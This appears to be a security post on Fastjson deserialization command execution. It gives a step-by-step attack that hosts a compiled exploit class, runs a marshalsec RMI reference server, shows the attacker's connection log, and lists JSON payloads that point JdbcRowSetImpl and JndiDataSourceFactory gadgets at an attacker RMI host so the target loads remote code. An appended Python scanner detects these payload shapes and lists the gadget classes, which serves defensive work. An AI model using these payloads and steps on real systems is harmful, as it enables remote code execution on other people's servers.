Fastjson Command Execution

# The Fastjson vulnerability allows command execution

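Attack flow:
1. On a machine with Java installed, run javac ExportObject.java to produce ExportObject.class
2. Place ExportObject.class on an Internet-facing HTTP server, for example http://<your server IP>/ExportObject.class
3. On that Internet-facing server, run java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://<your server IP>/#ExportObject 10086, which exposes the class hosted at that HTTP location as an RMI service
4. Run on the target site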

Attacker side:
```
root@test:~/tools/rmi# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://183.2.xxx.xxx/#Exploit 10086
* Opening JRMP listener on 10086
Have connection from /121.xxx.xxx.xxx:55837
Reading message...
Is RMI.lookup call for Exploit 2
Sending remote classloading stub targeting http://183.2.xxx.xxx/Exploit.class
Closing connection
```
1. Older versions
```
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://恶意主机:端口/Object","autoCommit":true}
{\"@type\":\"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;\",\"dataSourceName\":\"rmi://xxx.24.xxx.xxx:80/Object\",\"autoCommit\":true}
{"name":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://183.2.xxx.xxx:10086/Exploit","autoCommit":true},age:12}
```
2. Versions including 1.2.45
```
{"name":{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://xxx.2.xxx.xxx:10086/Exploit"},"autoCommit":true},age:12}
```
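
For detection, the payload shapes listed above (plain, \u-escaped with L…; wrapping, and nested next to an unquoted key) can be matched in request bodies or proxy logs. The Python below is an added example, not part of the original post; the function names are hypothetical and the sample bodies are constructed with documentation addresses.

```python
import re

# Gadget classes taken from the payloads on this page; extend from your own deny list.
JNDI_GADGETS = {
    "com.sun.rowset.JdbcRowSetImpl",
    "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
}
UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
TYPE_FIELD = re.compile(r"""["']?@type["']?\s*:\s*["']([^"']+)["']""")
# The page uses rmi://; ldap:// is included as the other common JNDI scheme.
JNDI_URL = re.compile(r"""["']((?:rmi|ldaps?)://[^"']+)["']""", re.I)

# Constructed request bodies (documentation addresses, hypothetical benign class).
SAMPLES = {
    "plain": '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.0.2.10:10086/Object","autoCommit":true}',
    "escaped": r'{\"@type\":\"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;\",\"dataSourceName\":\"rmi://192.0.2.10:80/Object\",\"autoCommit\":true}',
    "nested": '{"name":{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://192.0.2.10:10086/Object"}},age:12}',
    "benign_type": '{"@type":"com.example.User","name":"alice"}',
    "benign": '{"name":"alice","homepage":"https://example.org","age":12}',
}


def normalize(body):
    """Undo the escaping a lenient parser would undo before resolving the class."""
    body = body.replace('\\"', '"')  # quotes escaped as in a Java string or log line
    return UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), body)


def canonical_class(name):
    """Strip JVM descriptor wrapping such as 'LLcom.x.Y;;' or '[com.x.Y'."""
    name = name.strip()
    while True:
        if name.startswith("L") and name.endswith(";"):
            name = name[1:-1]
        elif name.startswith("["):
            name = name[1:]
        else:
            return name


def scan(body):
    """Return (kind, value) findings; regex-based because bodies may not be strict JSON."""
    text = normalize(body)
    types = [canonical_class(m.group(1)) for m in TYPE_FIELD.finditer(text)]
    findings = [("gadget", c) for c in types if c in JNDI_GADGETS]
    if types:  # a JNDI URL only matters next to an @type directive
        findings += [("jndi-url", m.group(1)) for m in JNDI_URL.finditer(text)]
    return findings


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, scan(body))
```

The scanner works on raw text rather than a strict JSON parser because bodies such as the nested one, with its unquoted age key, are accepted by Fastjson but rejected by standard parsers.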
